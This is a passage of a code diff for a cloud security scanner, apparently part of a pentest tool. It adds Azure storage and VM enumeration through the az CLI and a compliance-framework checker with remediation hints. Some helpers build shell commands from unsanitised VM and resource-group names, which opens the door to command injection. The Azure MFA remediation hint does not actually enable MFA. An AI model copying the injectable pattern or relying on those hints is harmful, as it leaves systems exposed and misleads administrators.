+      // No versioning
+      if (!account.versioningEnabled) {
+        findings.push(createFinding(
+          scanID,
+          "low",
+          "Azure Storage Account Without Versioning",
+          `Storage account ${account.name} does not have blob versioning enabled.`,
+          account
+        ))
+      }
+    }
+
+    return findings
+  }
+
+  function createFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    account: CloudScanTypes.StorageBucket
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `azure_storage_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "azure",
+      region: account.region,
+      severity,
+      title,
+      description,
+      resourceType: "bucket",
+      resourceId: account.id,
+      category: "storage",
+      complianceFrameworks: ["cis", "azure-security-benchmark"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "azure",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "storage",
+      resourceType: "bucket",
+      resourceId: account.id,
+    })
+
+    return finding
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/azure/vm.ts b/packages/opencode/src/pentest/cloudscan/azure/vm.ts
new file mode 100644
index 00000000000..34016c402da
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/azure/vm.ts
@@ -0,0 +1,412 @@
+/**
+ * @fileoverview Azure Virtual Machine Analysis
+ *
+ * Azure VM enumeration and security analysis.
+ *
+ * @module pentest/cloudscan/azure/vm
+ */
+
+import { CloudScanTypes } from "../types"
+import { CloudScanEvents } from "../events"
+import { AzureCLIParser } from "../parsers/azure-cli"
+import { Bus } from "../../../bus"
+import { Log } from "../../../util/log"
+import { exec } from "child_process"
+import { promisify } from "util"
+
+const execAsync = promisify(exec)
+
+const log = Log.create({ service: "cloudscan.azure.vm" })
+
+/**
+ * Azure VM options.
+ */
+export interface AzureVMOptions {
+  subscriptionId?: string
+  resourceGroup?: string
+  timeout?: number
+}
+
+/**
+ * Azure VM result.
+ */
+export interface AzureVMResult {
+  vms: CloudScanTypes.ComputeInstance[]
+  functions: CloudScanTypes.ServerlessFunction[]
+  findings: string[]
+  issues: CloudScanTypes.CloudFinding[]
+}
+
+/**
+ * Azure VM namespace.
+ */
+export namespace AzureVM {
+  /**
+   * Enumerate all VMs and Azure Functions.
+   */
+  export async function enumerate(
+    scanID: string,
+    options: AzureVMOptions = {}
+  ): Promise<AzureVMResult> {
+    const result: AzureVMResult = {
+      vms: [],
+      functions: [],
+      findings: [],
+      issues: [],
+    }
+
+    const subscriptionFlag = options.subscriptionId ? `--subscription ${options.subscriptionId}` : ""
+    const rgFlag = options.resourceGroup ? `--resource-group ${options.resourceGroup}` : ""
+
+    try {
+      // Enumerate VMs
+      log.info("Enumerating Azure VMs")
+      const vmOutput = await runAzureCommand(
+        `az vm list -d ${subscriptionFlag} ${rgFlag} --output json`,
+        options.timeout
+      )
+
+      if (vmOutput) {
+        result.vms = AzureCLIParser.parseVirtualMachines(vmOutput)
+        result.findings.push(`Found ${result.vms.length} Virtual Machines`)
+
+        for (const vm of result.vms) {
+          Bus.publish(CloudScanEvents.InstanceFound, {
+            scanID,
+            provider: "azure",
+            instanceId: vm.id,
+            instanceName: vm.name,
+            instanceType: vm.instanceType,
+            state: vm.state,
+            isPublic: vm.publiclyAccessible,
+            region: vm.region,
+          })
+        }
+      }
+
+      // Enumerate Function Apps
+      log.info("Enumerating Azure Function Apps")
+      const funcOutput = await runAzureCommand(
+        `az functionapp list ${subscriptionFlag} ${rgFlag} --output json`,
+        options.timeout
+      )
+
+      if (funcOutput) {
+        result.functions = AzureCLIParser.parseFunctionApps(funcOutput)
+        result.findings.push(`Found ${result.functions.length} Function Apps`)
+
+        for (const fn of result.functions) {
+          Bus.publish(CloudScanEvents.FunctionFound, {
+            scanID,
+            provider: "azure",
+            functionName: fn.name,
+            functionArn: fn.arn,
+            runtime: fn.runtime,
+            isPublic: fn.publiclyAccessible,
+            hasVpcConfig: !!fn.vpcConfig,
+          })
+        }
+      }
+
+      // Analyze for security issues
+      result.issues = analyzeComputeSecurity(scanID, result)
+
+    } catch (err) {
+      log.error("Azure compute enumeration failed", { error: String(err) })
+      result.findings.push(`Azure compute enumeration error: ${String(err)}`)
+    }
+
+    return result
+  }
+
+  /**
+   * Get VMs with public IPs.
+   */
+  export async function getPublicVMs(
+    options: AzureVMOptions = {}
+  ): Promise<CloudScanTypes.ComputeInstance[]> {
+    const { vms } = await enumerate("check", options)
+    return vms.filter((vm) => vm.publiclyAccessible && vm.state === "running")
+  }
+
+  /**
+   * Get VMs without managed identity.
+   */
+  export async function getVMsWithoutManagedIdentity(
+    options: AzureVMOptions = {}
+  ): Promise<CloudScanTypes.ComputeInstance[]> {
+    const { vms } = await enumerate("check", options)
+    return vms.filter((vm) => !vm.iamRole && vm.state === "running")
+  }
+
+  /**
+   * Get VMs with unencrypted disks.
+   */
+  export async function getVMsWithUnencryptedDisks(
+    options: AzureVMOptions = {}
+  ): Promise<CloudScanTypes.ComputeInstance[]> {
+    const subscriptionFlag = options.subscriptionId ? `--subscription ${options.subscriptionId}` : ""
+
+    try {
+      // Get disks
+      const diskOutput = await runAzureCommand(
+        `az disk list ${subscriptionFlag} --output json`,
+        options.timeout
+      )
+
+      if (!diskOutput) return []
+
+      const disks = JSON.parse(diskOutput)
+      const unencryptedDiskVMs = new Set<string>()
+
+      for (const disk of disks) {
+        if (!disk.encryption?.type || disk.encryption.type === "EncryptionAtRestWithPlatformKey") {
+          // Platform-managed key is okay, but no encryption is bad
+          if (disk.managedBy) {
+            // Extract VM name from managedBy path
+            const vmMatch = disk.managedBy.match(/virtualMachines\/([^/]+)/)
+            if (vmMatch) {
+              unencryptedDiskVMs.add(vmMatch[1])
+            }
+          }
+        }
+      }
+
+      const { vms } = await enumerate("check", options)
+      return vms.filter((vm) => unencryptedDiskVMs.has(vm.name))
+    } catch (err) {
+      log.error("Failed to check disk encryption", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Get Function Apps without authentication.
+   */
+  export async function getFunctionsWithoutAuth(
+    options: AzureVMOptions = {}
+  ): Promise<CloudScanTypes.ServerlessFunction[]> {
+    const { functions } = await enumerate("check", options)
+    return functions.filter((fn) => fn.publiclyAccessible)
+  }
+
+  /**
+   * Check VM for common security issues.
+   */
+  export async function check(
+    vmName: string,
+    resourceGroup: string,
+    options: AzureVMOptions = {}
+  ): Promise<{
+    vm: CloudScanTypes.ComputeInstance | null
+    issues: string[]
+  }> {
+    const subscriptionFlag = options.subscriptionId ? `--subscription ${options.subscriptionId}` : ""
+
+    try {
+      const output = await runAzureCommand(
+        `az vm show -d --name ${vmName} --resource-group ${resourceGroup} ${subscriptionFlag} --output json`,
+        options.timeout
+      )
+
+      if (!output) {
+        return { vm: null, issues: ["Failed to get VM"] }
+      }
+
+      const vms = AzureCLIParser.parseVirtualMachines(`[${output}]`)
+      if (vms.length === 0) {
+        return { vm: null, issues: ["VM not found"] }
+      }
+
+      const vm = vms[0]
+      const issues: string[] = []
+
+      // Check for public IP
+      if (vm.publiclyAccessible) {
+        issues.push("VM has a public IP address")
+      }
+
+      // Check for managed identity
+      if (!vm.iamRole) {
+        issues.push("VM does not have a managed identity")
+      }
+
+      // Check disk encryption
+      const diskOutput = await runAzureCommand(
+        `az vm show --name ${vmName} --resource-group ${resourceGroup} ${subscriptionFlag} --query "storageProfile.osDisk.encryptionSettings" --output json`,
+        options.timeout
+      )
+
+      if (diskOutput) {
+        const encryption = JSON.parse(diskOutput)
+        if (!encryption?.enabled) {
+          issues.push("OS disk encryption is not enabled")
+          vm.encryptedVolumes = false
+        }
+      }
+
+      return { vm, issues }
+    } catch (err) {
+      log.error("Failed to check VM", { vmName, error: String(err) })
+      return { vm: null, issues: [String(err)] }
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  async function runAzureCommand(command: string, _timeout?: number): Promise<string | null> {
+    try {
+      const { stdout } = await execAsync(command)
+      return stdout.trim()
+    } catch (err) {
+      log.debug("Azure command failed", { command, error: String(err) })
+      return null
+    }
+  }
+
+  function analyzeComputeSecurity(
+    scanID: string,
+    result: AzureVMResult
+  ): CloudScanTypes.CloudFinding[] {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    // Check VMs
+    for (const vm of result.vms) {
+      if (vm.state !== "running") continue
+
+      // Public VM
+      if (vm.publiclyAccessible) {
+        findings.push(createVMFinding(
+          scanID,
+          "medium",
+          "Azure VM Has Public IP",
+          `VM ${vm.name} has a public IP address (${vm.publicIp}).`,
+          vm
+        ))
+      }
+
+      // No managed identity
+      if (!vm.iamRole) {
+        findings.push(createVMFinding(
+          scanID,
+          "low",
+          "Azure VM Without Managed Identity",
+          `VM ${vm.name} does not have a managed identity configured.`,
+          vm
+        ))
+      }
+
+      // Unencrypted disks
+      if (vm.encryptedVolumes === false) {
+        findings.push(createVMFinding(
+          scanID,
+          "high",
+          "Azure VM With Unencrypted Disk",
+          `VM ${vm.name} has unencrypted disk(s).`,
+          vm
+        ))
+      }
+    }
+
+    // Check Functions
+    for (const fn of result.functions) {
+      // Public function without auth
+      if (fn.publiclyAccessible) {
+        findings.push(createFunctionFinding(
+          scanID,
+          "high",
+          "Azure Function App Without Authentication",
+          `Function App ${fn.name} is publicly accessible without authentication.`,
+          fn
+        ))
+      }
+
+      // Function not in VNet
+      if (!fn.vpcConfig) {
+        findings.push(createFunctionFinding(
+          scanID,
+          "info",
+          "Azure Function App Not in VNet",
+          `Function App ${fn.name} is not integrated with a Virtual Network.`,
+          fn
+        ))
+      }
+    }
+
+    return findings
+  }
+
+  function createVMFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    vm: CloudScanTypes.ComputeInstance
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `azure_vm_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "azure",
+      region: vm.region,
+      severity,
+      title,
+      description,
+      resourceType: "vm",
+      resourceId: vm.id,
+      category: "compute",
+      complianceFrameworks: ["cis", "azure-security-benchmark"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "azure",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "compute",
+      resourceType: "vm",
+      resourceId: vm.id,
+    })
+
+    return finding
+  }
+
+  function createFunctionFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    fn: CloudScanTypes.ServerlessFunction
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `azure_func_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "azure",
+      region: fn.region,
+      severity,
+      title,
+      description,
+      resourceType: "function",
+      resourceId: fn.id,
+      category: "compute",
+      complianceFrameworks: ["cis", "azure-security-benchmark"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "azure",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "compute",
+      resourceType: "function",
+      resourceId: fn.id,
+    })
+
+    return finding
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/compliance.ts b/packages/opencode/src/pentest/cloudscan/compliance.ts
new file mode 100644
index 00000000000..8f42d93200f
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/compliance.ts
@@ -0,0 +1,661 @@
+/**
+ * @fileoverview Compliance Framework Checker
+ *
+ * Maps cloud security findings to compliance frameworks.
+ *
+ * @module pentest/cloudscan/compliance
+ */
+
+import { CloudScanTypes } from "./types"
+import { CloudScanEvents } from "./events"
+import { Bus } from "../../bus"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "cloudscan.compliance" })
+
+/**
+ * Compliance check result.
+ */
+export interface ComplianceResult {
+  framework: CloudScanTypes.ComplianceFramework
+  version: string
+  provider: CloudScanTypes.CloudProvider
+  checks: CloudScanTypes.ComplianceCheck[]
+  summary: {
+    total: number
+    passed: number
+    failed: number
+    unknown: number
+    passRate: number
+  }
+  byCategory: Record<string, { passed: number; failed: number }>
+  bySeverity: Record<CloudScanTypes.Severity, number>
+}
+
+/**
+ * Compliance check definition.
+ */
+interface ComplianceCheckDef {
+  id: string
+  title: string
+  description: string
+  category: string
+  severity: CloudScanTypes.Severity
+  frameworks: CloudScanTypes.ComplianceFramework[]
+  resourceTypes: CloudScanTypes.ResourceType[]
+  check: (findings: CloudScanTypes.CloudFinding[]) => boolean
+}
+
+/**
+ * ComplianceChecker namespace.
+ */
+export namespace ComplianceChecker {
+  /**
+   * Run compliance checks against findings.
+   */
+  export function evaluate(
+    scanID: string,
+    provider: CloudScanTypes.CloudProvider,
+    framework: CloudScanTypes.ComplianceFramework,
+    findings: CloudScanTypes.CloudFinding[]
+  ): ComplianceResult {
+    const checks = getChecksForFramework(framework, provider)
+    const results: CloudScanTypes.ComplianceCheck[] = []
+
+    for (const checkDef of checks) {
+      const relevantFindings = findings.filter(
+        (f) =>
+          f.complianceFrameworks?.includes(framework) ||
+          (f.resourceType && checkDef.resourceTypes.includes(f.resourceType))
+      )
+
+      const passed = checkDef.check(relevantFindings)
+      const status: CloudScanTypes.ComplianceCheck["status"] = passed ? "passed" : "failed"
+
+      const check: CloudScanTypes.ComplianceCheck = {
+        id: checkDef.id,
+        framework,
+        controlId: checkDef.id,
+        controlTitle: checkDef.title,
+        description: checkDef.description,
+        status,
+        severity: checkDef.severity,
+        resourceType: checkDef.resourceTypes[0] || "policy",
+        finding: relevantFindings.map((f) => f.id).join(", "),
+        remediation: getRemediation(checkDef.id, provider),
+        checkedAt: Date.now(),
+      }
+
+      results.push(check)
+
+      if (status === "failed") {
+        Bus.publish(CloudScanEvents.ComplianceViolation, {
+          scanID,
+          framework,
+          controlId: check.id,
+          title: checkDef.title,
+          severity: check.severity,
+        })
+      }
+    }
+
+    const result = calculateComplianceResult(framework, provider, results)
+
+    Bus.publish(CloudScanEvents.ComplianceComplete, {
+      scanID,
+      framework,
+      passed: result.summary.passed,
+      failed: result.summary.failed,
+      score: result.summary.passRate,
+    })
+
+    return result
+  }
+
+  /**
+   * Evaluate multiple frameworks.
+   */
+  export function evaluateAll(
+    scanID: string,
+    provider: CloudScanTypes.CloudProvider,
+    frameworks: CloudScanTypes.ComplianceFramework[],
+    findings: CloudScanTypes.CloudFinding[]
+  ): ComplianceResult[] {
+    return frameworks.map((framework) =>
+      evaluate(scanID, provider, framework, findings)
+    )
+  }
+
+  /**
+   * Get available frameworks for a provider.
+   */
+  export function getFrameworks(
+    provider: CloudScanTypes.CloudProvider
+  ): CloudScanTypes.ComplianceFramework[] {
+    const common: CloudScanTypes.ComplianceFramework[] = [
+      "cis",
+      "nist",
+      "pci-dss",
+      "hipaa",
+      "soc2",
+      "gdpr",
+      "iso27001",
+    ]
+
+    switch (provider) {
+      case "aws":
+        return [...common, "aws-foundational-security"]
+      case "azure":
+        return [...common, "azure-security-benchmark"]
+      case "gcp":
+        return [...common, "gcp-security-foundations"]
+      default:
+        return common
+    }
+  }
+
+  /**
+   * Get framework metadata.
+   */
+  export function getFrameworkInfo(
+    framework: CloudScanTypes.ComplianceFramework
+  ): {
+    name: string
+    description: string
+    version: string
+    url: string
+  } {
+    const info: Record<
+      CloudScanTypes.ComplianceFramework,
+      { name: string; description: string; version: string; url: string }
+    > = {
+      cis: {
+        name: "CIS Benchmarks",
+        description: "Center for Internet Security cloud benchmarks",
+        version: "2.0",
+        url: "https://www.cisecurity.org/benchmark",
+      },
+      nist: {
+        name: "NIST Cybersecurity Framework",
+        description: "National Institute of Standards and Technology framework",
+        version: "1.1",
+        url: "https://www.nist.gov/cyberframework",
+      },
+      "pci-dss": {
+        name: "PCI DSS",
+        description: "Payment Card Industry Data Security Standard",
+        version: "4.0",
+        url: "https://www.pcisecuritystandards.org",
+      },
+      hipaa: {
+        name: "HIPAA",
+        description: "Health Insurance Portability and Accountability Act",
+        version: "2023",
+        url: "https://www.hhs.gov/hipaa",
+      },
+      soc2: {
+        name: "SOC 2",
+        description: "Service Organization Control 2",
+        version: "2017",
+        url: "https://www.aicpa.org/soc4so",
+      },
+      gdpr: {
+        name: "GDPR",
+        description: "General Data Protection Regulation",
+        version: "2018",
+        url: "https://gdpr.eu",
+      },
+      iso27001: {
+        name: "ISO 27001",
+        description: "Information Security Management System standard",
+        version: "2022",
+        url: "https://www.iso.org/isoiec-27001-information-security.html",
+      },
+      "aws-foundational-security": {
+        name: "AWS Foundational Security Best Practices",
+        description: "AWS security best practices standard",
+        version: "1.0",
+        url: "https://docs.aws.amazon.com/securityhub/latest/userguide/securityhub-standards-fsbp.html",
+      },
+      "azure-security-benchmark": {
+        name: "Azure Security Benchmark",
+        description: "Microsoft Azure security best practices",
+        version: "3.0",
+        url: "https://learn.microsoft.com/en-us/security/benchmark/azure/overview",
+      },
+      "gcp-security-foundations": {
+        name: "GCP Security Foundations",
+        description: "Google Cloud security best practices",
+        version: "1.0",
+        url: "https://cloud.google.com/docs/enterprise/best-practices-for-enterprise-organizations",
+      },
+      "aws-well-architected": {
+        name: "AWS Well-Architected Framework",
+        description: "AWS best practices for building secure, high-performing, resilient, and efficient infrastructure",
+        version: "2023",
+        url: "https://aws.amazon.com/architecture/well-architected/",
+      },
+    }
+
+    return info[framework]
+  }
+
+  // ========== Check Definitions ==========
+
+  function getChecksForFramework(
+    framework: CloudScanTypes.ComplianceFramework,
+    provider: CloudScanTypes.CloudProvider
+  ): ComplianceCheckDef[] {
+    const allChecks = getProviderChecks(provider)
+    return allChecks.filter((c) => c.frameworks.includes(framework))
+  }
+
+  function getProviderChecks(
+    provider: CloudScanTypes.CloudProvider
+  ): ComplianceCheckDef[] {
+    const commonChecks: ComplianceCheckDef[] = [
+      // IAM checks
+      {
+        id: "iam-mfa-enabled",
+        title: "MFA Enabled for IAM Users",
+        description: "IAM users should have MFA enabled",
+        category: "Identity and Access Management",
+        severity: "high",
+        frameworks: ["cis", "nist", "pci-dss", "hipaa", "soc2"],
+        resourceTypes: ["user"],
+        check: (findings) =>
+          !findings.some((f) => f.title.toLowerCase().includes("mfa")),
+      },
+      {
+        id: "iam-no-root-access-keys",
+        title: "No Root Access Keys",
+        description: "Root account should not have access keys",
+        category: "Identity and Access Management",
+        severity: "critical",
+        frameworks: ["cis", "nist", "pci-dss"],
+        resourceTypes: ["user"],
+        check: (findings) =>
+          !findings.some((f) => f.title.toLowerCase().includes("root")),
+      },
+      {
+        id: "iam-least-privilege",
+        title: "Least Privilege Access",
+        description: "Users should have minimal necessary permissions",
+        category: "Identity and Access Management",
+        severity: "medium",
+        frameworks: ["cis", "nist", "pci-dss", "hipaa", "soc2", "gdpr", "iso27001"],
+        resourceTypes: ["user", "role", "policy"],
+        check: (findings) =>
+          !findings.some(
+            (f) =>
+              f.title.toLowerCase().includes("admin") ||
+              f.title.toLowerCase().includes("overly permissive")
+          ),
+      },
+      {
+        id: "iam-access-key-rotation",
+        title: "Access Key Rotation",
+        description: "Access keys should be rotated regularly",
+        category: "Identity and Access Management",
+        severity: "medium",
+        frameworks: ["cis", "nist", "pci-dss", "soc2"],
+        resourceTypes: ["user", "service-account"],
+        check: (findings) =>
+          !findings.some((f) => f.title.toLowerCase().includes("old key")),
+      },
+
+      // Storage checks
+      {
+        id: "storage-no-public-access",
+        title: "No Public Storage Access",
+        description: "Storage buckets should not allow public access",
+        category: "Data Protection",
+        severity: "high",
+        frameworks: ["cis", "nist", "pci-dss", "hipaa", "soc2", "gdpr", "iso27001"],
+        resourceTypes: ["bucket"],
+        check: (findings) =>
+          !findings.some((f) => f.title.toLowerCase().includes("public")),
+      },
+      {
+        id: "storage-encryption-enabled",
+        title: "Storage Encryption",
+        description: "Storage should be encrypted at rest",
+        category: "Data Protection",
+        severity: "high",
+        frameworks: ["cis", "nist", "pci-dss", "hipaa", "soc2", "gdpr", "iso27001"],
+        resourceTypes: ["bucket"],
+        check: (findings) =>
+          !findings.some(
+            (f) =>
+              f.title.toLowerCase().includes("unencrypted") ||
+              f.title.toLowerCase().includes("encryption not enabled")
+          ),
+      },
+      {
+        id: "storage-versioning-enabled",
+        title: "Storage Versioning",
+        description: "Storage should have versioning enabled",
+        category: "Data Protection",
+        severity: "low",
+        frameworks: ["cis", "soc2"],
+        resourceTypes: ["bucket"],
+        check: (findings) =>
+          !findings.some((f) => f.title.toLowerCase().includes("versioning")),
+      },
+      {
+        id: "storage-logging-enabled",
+        title: "Storage Access Logging",
+        description: "Storage access logging should be enabled",
+        category: "Logging and Monitoring",
+        severity: "medium",
+        frameworks: ["cis", "nist", "pci-dss", "hipaa", "soc2"],
+        resourceTypes: ["bucket"],
+        check: (findings) =>
+          !findings.some((f) => f.title.toLowerCase().includes("logging")),
+      },
+
+      // Network checks
+      {
+        id: "network-no-unrestricted-ingress",
+        title: "No Unrestricted Ingress",
+        description: "Security groups should not allow unrestricted ingress",
+        category: "Network Security",
+        severity: "critical",
+        frameworks: ["cis", "nist", "pci-dss", "hipaa", "soc2", "iso27001"],
+        resourceTypes: ["security-group"],
+        check: (findings) =>
+          !findings.some((f) => f.title.toLowerCase().includes("unrestricted")),
+      },
+      {
+        id: "network-no-ssh-from-internet",
+        title: "No SSH from Internet",
+        description: "SSH should not be accessible from the internet",
+        category: "Network Security",
+        severity: "high",
+        frameworks: ["cis", "nist", "pci-dss"],
+        resourceTypes: ["security-group"],
+        check: (findings) =>
+          !findings.some((f) => f.title.toLowerCase().includes("ssh")),
+      },
+      {
+        id: "network-no-rdp-from-internet",
+        title: "No RDP from Internet",
+        description: "RDP should not be accessible from the internet",
+        category: "Network Security",
+        severity: "high",
+        frameworks: ["cis", "nist", "pci-dss"],
+        resourceTypes: ["security-group"],
+        check: (findings) =>
+          !findings.some((f) => f.title.toLowerCase().includes("rdp")),
+      },
+      {
+        id: "network-no-db-from-internet",
+        title: "No Database Access from Internet",
+        description: "Database ports should not be accessible from the internet",
+        category: "Network Security",
+        severity: "critical",
+        frameworks: ["cis", "nist", "pci-dss", "hipaa"],
+        resourceTypes: ["security-group"],
+        check: (findings) =>
+          !findings.some(
+            (f) =>
+              f.title.toLowerCase().includes("mysql") ||
+              f.title.toLowerCase().includes("postgresql") ||
+              f.title.toLowerCase().includes("mssql") ||
+              f.title.toLowerCase().includes("mongodb") ||
+              f.title.toLowerCase().includes("redis")
+          ),
+      },
+      {
+        id: "network-vpc-flow-logs",
+        title: "VPC Flow Logs Enabled",
+        description: "VPC flow logs should be enabled for network monitoring",
+        category: "Logging and Monitoring",
+        severity: "medium",
+        frameworks: ["cis", "nist", "pci-dss", "soc2"],
+        resourceTypes: ["vpc"],
+        check: (findings) =>
+          !findings.some((f) => f.title.toLowerCase().includes("flow log")),
+      },
+
+      // Compute checks
+      {
+        id: "compute-no-public-ip",
+        title: "Instances Without Public IP",
+        description: "Compute instances should not have public IPs unless necessary",
+        category: "Network Security",
+        severity: "medium",
+        frameworks: ["cis", "nist"],
+        resourceTypes: ["instance"],
+        check: (findings) =>
+          !findings.some((f) => f.title.toLowerCase().includes("public ip")),
+      },
+      {
+        id: "compute-imdsv2",
+        title: "Instance Metadata Service v2",
+        description: "Instances should use IMDSv2 for metadata access",
+        category: "Compute Security",
+        severity: "medium",
+        frameworks: ["cis", "aws-foundational-security"],
+        resourceTypes: ["instance"],
+        check: (findings) =>
+          !findings.some((f) => f.title.toLowerCase().includes("imdsv2")),
+      },
+
+      // Serverless checks
+      {
+        id: "serverless-no-public-access",
+        title: "No Public Serverless Functions",
+        description: "Serverless functions should not be publicly accessible",
+        category: "Application Security",
+        severity: "high",
+        frameworks: ["cis", "nist", "pci-dss"],
+        resourceTypes: ["function"],
+        check: (findings) =>
+          !findings.some(
+            (f) =>
+              f.resourceType === "function" &&
+              f.title.toLowerCase().includes("public")
+          ),
+      },
+      {
+        id: "serverless-no-secrets-in-env",
+        title: "No Secrets in Environment Variables",
+        description: "Secrets should not be stored in function environment variables",
+        category: "Data Protection",
+        severity: "high",
+        frameworks: ["cis", "nist", "pci-dss", "hipaa"],
+        resourceTypes: ["function"],
+        check: (findings) =>
+          !findings.some((f) => f.title.toLowerCase().includes("secret")),
+      },
+    ]
+
+    // Add provider-specific checks
+    switch (provider) {
+      case "aws":
+        return [
+          ...commonChecks,
+          {
+            id: "aws-s3-ssl-requests-only",
+            title: "S3 SSL Requests Only",
+            description: "S3 buckets should require SSL for requests",
+            category: "Data Protection",
+            severity: "medium",
+            frameworks: ["cis", "aws-foundational-security", "pci-dss"],
+            resourceTypes: ["bucket"],
+            check: (findings) =>
+              !findings.some((f) => f.title.toLowerCase().includes("ssl")),
+          },
+          {
+            id: "aws-iam-password-policy",
+            title: "Strong IAM Password Policy",
+            description: "IAM password policy should be strong",
+            category: "Identity and Access Management",
+            severity: "medium",
+            frameworks: ["cis", "aws-foundational-security", "nist"],
+            resourceTypes: ["policy"],
+            check: (findings) =>
+              !findings.some((f) => f.title.toLowerCase().includes("password policy")),
+          },
+        ]
+
+      case "azure":
+        return [
+          ...commonChecks,
+          {
+            id: "azure-storage-https-only",
+            title: "Storage HTTPS Only",
+            description: "Storage accounts should require HTTPS",
+            category: "Data Protection",
+            severity: "medium",
+            frameworks: ["cis", "azure-security-benchmark", "pci-dss"],
+            resourceTypes: ["bucket"],
+            check: (findings) =>
+              !findings.some((f) => f.title.toLowerCase().includes("https")),
+          },
+          {
+            id: "azure-ad-mfa",
+            title: "Azure AD MFA",
+            description: "Azure AD users should have MFA enabled",
+            category: "Identity and Access Management",
+            severity: "high",
+            frameworks: ["cis", "azure-security-benchmark", "nist"],
+            resourceTypes: ["user"],
+            check: (findings) =>
+              !findings.some((f) => f.title.toLowerCase().includes("mfa")),
+          },
+        ]
+
+      case "gcp":
+        return [
+          ...commonChecks,
+          {
+            id: "gcp-uniform-bucket-access",
+            title: "Uniform Bucket-Level Access",
+            description: "GCS buckets should use uniform bucket-level access",
+            category: "Data Protection",
+            severity: "medium",
+            frameworks: ["cis", "gcp-security-foundations"],
+            resourceTypes: ["bucket"],
+            check: (findings) =>
+              !findings.some((f) => f.title.toLowerCase().includes("acl")),
+          },
+          {
+            id: "gcp-os-login",
+            title: "OS Login Enabled",
+            description: "GCE instances should use OS Login",
+            category: "Identity and Access Management",
+            severity: "medium",
+            frameworks: ["cis", "gcp-security-foundations"],
+            resourceTypes: ["instance"],
+            check: (findings) =>
+              !findings.some((f) => f.title.toLowerCase().includes("os login")),
+          },
+        ]
+
+      default:
+        return commonChecks
+    }
+  }
+
+  // ========== Remediation ==========
+
+  function getRemediation(
+    checkId: string,
+    provider: CloudScanTypes.CloudProvider
+  ): string {
+    const remediations: Record<string, Record<CloudScanTypes.CloudProvider, string>> = {
+      "iam-mfa-enabled": {
+        aws: "Enable MFA for IAM users: aws iam enable-mfa-device --user-name USER --serial-number ARN --authentication-code1 CODE1 --authentication-code2 CODE2",
+        azure: "Enable MFA in Azure AD: az ad user update --id USER_ID --force-change-password-next-sign-in true",
+        gcp: "Enable 2-Step Verification in Google Workspace Admin Console",
+      },
+      "storage-no-public-access": {
+        aws: "Block public access: aws s3api put-public-access-block --bucket BUCKET --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true",
+        azure: "Disable anonymous access: az storage account update --name ACCOUNT --allow-blob-public-access false",
+        gcp: "Enforce public access prevention: gcloud storage buckets update gs://BUCKET --public-access-prevention=enforced",
+      },
+      "network-no-unrestricted-ingress": {
+        aws: "Remove 0.0.0.0/0 ingress rules from security groups",
+        azure: "Remove * source address rules from NSGs",
+        gcp: "Remove 0.0.0.0/0 source ranges from firewall rules",
+      },
+    }
+
+    const checkRemediations = remediations[checkId]
+    if (checkRemediations && checkRemediations[provider]) {
+      return checkRemediations[provider]
+    }
+
+    return `Review and remediate the finding according to ${provider.toUpperCase()} security best practices`
+  }
+
+  // ========== Result Calculation ==========
+
+  function calculateComplianceResult(
+    framework: CloudScanTypes.ComplianceFramework,
+    provider: CloudScanTypes.CloudProvider,
+    checks: CloudScanTypes.ComplianceCheck[]
+  ): ComplianceResult {
+    const passed = checks.filter((c) => c.status === "passed").length
+    const failed = checks.filter((c) => c.status === "failed").length
+    const unknown = checks.filter((c) => c.status === "skipped" || c.status === "warning").length
+
+    const byCategory: Record<string, { passed: number; failed: number }> = {}
+    const bySeverity: Record<CloudScanTypes.Severity, number> = {
+      critical: 0,
+      high: 0,
+      medium: 0,
+      low: 0,
+      info: 0,
+    }
+
+    for (const check of checks) {
+      // By category
+      const category = getCategoryForCheck(check.id)
+      if (!byCategory[category]) {
+        byCategory[category] = { passed: 0, failed: 0 }
+      }
+      if (check.status === "passed") {
+        byCategory[category].passed++
+      } else if (check.status === "failed") {
+        byCategory[category].failed++
+      }
+
+      // By severity (count failures only)
+      if (check.status === "failed") {
+        bySeverity[check.severity]++
+      }
+    }
+
+    const info = getFrameworkInfo(framework)
+
+    return {
+      framework,
+      version: info.version,
+      provider,
+      checks,
+      summary: {
+        total: checks.length,
+        passed,
+        failed,
+        unknown,
+        passRate: checks.length > 0 ? Math.round((passed / checks.length) * 100) : 0,
+      },
+      byCategory,
+      bySeverity,
+    }
+  }
+
+  function getCategoryForCheck(checkId: string): string {
+    if (checkId.startsWith("iam-")) return "Identity and Access Management"
+    if (checkId.startsWith("storage-")) return "Data Protection"
+    if (checkId.startsWith("network-")) return "Network Security"
+    if (checkId.startsWith("compute-")) return "Compute Security"
+    if (checkId.startsWith("serverless-")) return "Application Security"
+    if (checkId.includes("logging") || checkId.includes("monitoring"))
